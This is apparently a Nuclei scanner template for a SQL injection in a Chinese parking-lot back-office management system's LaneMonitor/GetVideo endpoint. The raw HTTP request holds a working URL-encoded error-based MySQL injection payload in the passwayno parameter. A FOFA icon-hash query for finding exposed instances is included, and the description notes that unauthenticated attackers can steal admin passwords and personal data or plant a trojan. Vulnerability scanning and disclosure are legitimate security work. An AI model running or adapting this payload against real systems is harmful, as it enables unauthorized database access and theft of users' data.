http:
    - matchers:
        - part: body
          type: word
          words:
            - qbzxq1qvxkq
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /LaneMonitor/GetVideo?passwayno=1%27+AND+GTID_SUBSET%28CONCAT%280x71627a7871%2C%28SELECT+%28ELT%283079%3D3079%2C1%29%29%29%2C0x7176786b71%29%2C3079%29+AND+%27OVwj%27%3D%27OVwj HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
          Accept-Encoding: gzip, deflate, br
          Connection: keep-alive
id: tingchechang-LaneMonitor_GetVideo-sql
info:
    author: Superhero
    description: |-
        fofa: icon_hash="938984120"
        停车场后台管理系统 LaneMonitor/GetVideo 存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 停车场后台管理系统 LaneMonitor/GetVideo 注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/PUF3nilyc7zkDV_xkJBD2A?token=1497378487&lang=zh_CN
    severity: high
    tags: []
